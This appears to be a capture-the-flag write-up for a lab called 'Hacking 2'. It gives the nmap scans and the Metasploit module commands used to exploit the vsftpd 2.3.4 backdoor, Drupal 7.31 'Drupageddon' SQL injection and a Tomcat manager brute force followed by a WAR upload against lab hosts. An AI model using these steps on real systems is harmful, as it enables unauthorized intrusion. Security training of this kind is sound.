SUCSS CTF Writeup

Hacking 2

Published: 18 Feb 2026 • Difficulty: Medium

metasploitnmaphttpftpssh

Hacking 2 is a medium-difficulty CTF focused on practical exploitation and the application of known vulnerabilities. The environment utilizes tools such as Metasploit and nmap to compromise targets across various stages.

  • vsftpd 2.3.4: Exploiting the documented backdoor.
  • Drupal 7.31: Leveraging the Drupageddon SQL injection (CVE-2014-3704).
  • Apache Tomcat 8.5.38: Exploiting the manager interface via unauthorized file uploads.

Certain services, including Nagios NSCA and SSH, are currently designated as work-in-progress and may not be fully exploitable in the current iteration.

Easy Level

$ nmap -sV 10.83.5.0/24

Key Findings:

IPPortServiceVersion
10.83.5.62121FTPvsftpd 2.3.4
10.83.5.98080nagios-nscaNagios NSCA
10.83.5.3780HTTPApache httpd 2.4.66 ((Debian))

Target 10.83.5.6 (Port 2121)

$ nmap -sV -sC -p 2121 10.83.5.6

PORT     STATE SERVICE VERSION
2121/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix
The Vulnerability: The scan reveals vsftpd 2.3.4, a release known to have been distributed with a malicious backdoor in 2011. If a user attempts to log in with a username ending in a smiley face :), the backdoor triggers and opens a listening shell on port 6200.

We can easily exploit this using Metasploit, which automates the process of triggering the backdoor and catching the shell.

$ msfconsole
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(...) > exploit

Once the session opens, grab the flag.

$ cat flag.txt

Target 10.83.5.9 (Port 8080)

$ nmap -sV -sC -p 8080 10.83.5.9

PORT     STATE SERVICE     VERSION
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
Status: This is currently a work-in-progress. Check back soon for the full solution!

Target 10.83.5.37 (Port 80)

$ nmap -sV -sC -p 80 10.83.5.37

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.66 ((Debian))
|_http-title: Welcome to Drupal731 | Drupal731
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.4.66 (Debian)
The Vulnerability: The HTTP we suggests version Drupal 7.31. This version is highly vulnerable to CVE-2014-3704, famously known as 'Drupageddon.' It is a severe SQL injection vulnerability in the database abstraction API that allows unauthenticated attackers to execute arbitrary code.

Metasploit has a built-in module to handle the Drupageddon SQLi-to-RCE chain.

$ msfconsole
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(...) > exploit

Once the session opens, grab the flag.

$ cat flag.txt

Medium Level

$ nmap -sV 10.83.6.0/24

Key Findings:

IPPortServiceVersion
10.83.6.78009AJP13Apache Jserv (Protocol v1.3)
10.83.6.78080HTTPApache Tomcat 8.5.38
10.83.6.922SSHOpenSSH 9.6p1 (Protocol 2.0)

Target 10.83.6.7 (Port 8080)

$ nmap -sV -sC -p 8080 10.83.6.7

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat 8.5.38
|_http-title: Apache Tomcat/8.5.38
The Vulnerability: The HTTP title indicates Apache Tomcat 8.5.38. This installation is highly vulnerable to malicious .war files, which are automatically executed upon upload via the exposed /manager interface.

We will use a two-step approach in Metasploit: first to find the credentials, and second to upload our payload. To find the credentials: Use the auxiliary scanner to brute-force the Tomcat manager login.

$ msfconsole
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(...) > run

Scanner successfully outputs default credentials manager:manager. To upload the payload: Switch to the exploit module to upload the malicious WAR file using the discovered credentials.

$ msfconsole
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(...) > exploit

Once the session opens, grab the flag.

$ cat flag.txt

Target 10.83.6.9 (Port 22)

Status: This is currently a work-in-progress. Check back soon for the full solution!